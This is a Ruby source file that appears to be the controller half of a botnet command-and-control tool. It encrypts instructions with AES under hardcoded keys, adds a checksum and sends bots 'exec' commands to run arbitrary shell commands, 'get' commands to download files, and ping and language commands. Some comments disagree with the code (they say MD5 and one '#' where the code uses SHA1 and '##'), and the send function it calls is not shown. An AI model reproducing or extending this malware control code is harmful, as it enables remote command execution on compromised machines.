require "base64"
require 'openssl'

# This checksum routine is unique to this language, it returns the first
# 10 digits of the MD5 of the message with a prepended # symbol
def create_checksum message
	checksum = "##" + Digest::SHA1.hexdigest(message).slice(0,10)
	return checksum
end

def calc_checksum message,verbose=false
	checksum = Digest::SHA1.hexdigest(message).slice(0,10)
	if verbose
		puts "Calculated SHA1 = "+checksum + " for " + message
	end
	return checksum
end

# Check the message length then encode
def checksum_encrypt_message (message)
	if message.length() > 120
		puts "Message too long, max length 120 characters. Aborting"
		exit 1
	end

	message += create_checksum(message)

	cipher = OpenSSL::Cipher::Cipher.new("aes-256-cbc")
	cipher.encrypt
	cipher.key = Digest::SHA2.hexdigest("yourpass")
	cipher.iv = Digest::SHA2.hexdigest("yourpass2")

	encrypted_message = cipher.update(message)
	encrypted_message << cipher.final

	encoded_message = Base64.encode64(encrypted_message).strip + "ZZZ"
	# Remove any new lines added by Base64 encoding
	encoded_message.gsub!("\n","")

	return encoded_message
end

# Send an exec command, the format for this is :cmd exec <command>
# On a linux system, unless the command is terminated with an & the
# bot will probably block until the command is finished
def send_exec_command(filename, verbose)
	if verbose
		puts "Execute command"
	end
	message = checksum_encrypt_message("exec " + filename)
	send_command(message,verbose)
end

# Send a get command. The bot will download the specified file
def send_get_command(filename, verbose)
	if verbose
		puts "Get command"
	end
	message = checksum_encrypt_message("get " + filename)
	send_command(message,verbose)
end

# Change the language to the one specified
def send_new_language_command(language, verbose)
	if verbose
		puts "New language command"
	end
	message=checksum_encrypt_message("language " + language)
	send_command(message,verbose)
end

# Send a ping command. The bot will ping the specified IP address
# Only doing IP at the moment so I can show input validation
def send_ping_command(ip_address, verbose)
	if verbose
		puts "Ping command"
	end
	message = checksum_encrypt_message("ping " + ip_address)
	send_command(message,verbose)
end
